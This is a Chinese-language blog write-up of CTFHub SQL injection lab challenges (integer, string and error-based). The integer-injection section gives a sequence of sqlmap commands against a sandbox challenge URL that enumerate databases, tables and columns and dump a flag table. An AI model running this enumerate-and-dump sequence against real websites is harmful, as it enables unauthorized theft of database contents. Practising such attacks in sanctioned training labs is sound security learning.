CTFHub 技能树 之 SQL注入

标题CTFHub 技能树 之SQL注入

进入CTFHub官网

一：SQL整数型注入

开题出现的界面是这样的，根据提示输入 1 后，出现两处回显，这里可以使用
工具注入也可以使用手工注入。

手工注入可以看一下这个博主写的查看手工注入

如果想了解工具的话就继续往下看吧☺
我使用的是 kali 自带的 sqlmap 工具
1）因为一开始我们就已经知道存在注入点，于是这个步骤可有可无，但是还是可以看看数据库版本信息

sqlmap -u http://challenge-96abcc6d23e688fa.sandbox.ctfhub.com:10080/?id=2

2）读取数据库库名

sqlmap -u http://challenge-96abcc6d23e688fa.sandbox.ctfhub.com:10080/?id=1 --dbs

得到数据库 sqli
3）得到库名就开始爆表

sqlmap -u http://challenge-96abcc6d23e688fa.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables

表里有一个表名为 flag 的表

4）既然库名表名都有了，接下来就是看表结构

sqlmap -u http://challenge-96abcc6d23e688fa.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns

里面也就一个flag

5）拿flag

sqlmap -u http://challenge-96abcc6d23e688fa.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag -C flag --dump

大家还是去实际操作一下，因为技能树中的除了彩蛋的flag是静态的，其它的都是动态了呢

二、字符型注入

这个题目打开依然是有两个回显点

还是先用sqlmap爆一下
这个题就不多啰嗦了，用sqlmap和前面整数型注入的步骤一样
1）爆库

2）爆表


3）爆flag

在最后爆flag提交时，出现了点小问题，出来的flag是上图形式的，我也不知道为什么，就在flaghub后添加了一个 { 然后本来弹出来的是错误，说实话我也不知道为什么，再次修改提交，然后弹出“该靶机未开启”，我还以为是时间到了，然后刷新看一下，发现已经完成了,我懵了，也不知道我提交的哪一个flag是正确的
o(╥﹏╥)o

三、报错注入

手工注入

大家可以看一下另一位师傅写的博客
手工注入
因为我也是直接用的万能工具sqlmap,还是上面那几个步骤就可以找到flag。
本来想让自己挑战一下的，可是时间不等人，也就放弃了

总结一下，sqlmap是万能的，没有sqlmap是万万不能的，不过如果是想好好学一下sql注入，还是建议用手工注入。后面的题都是可以用sqlmap扫出来的。本人也是小白，为了能好好了解，决定还是好好去了解一下手工注入，哈哈，不能完全依赖工具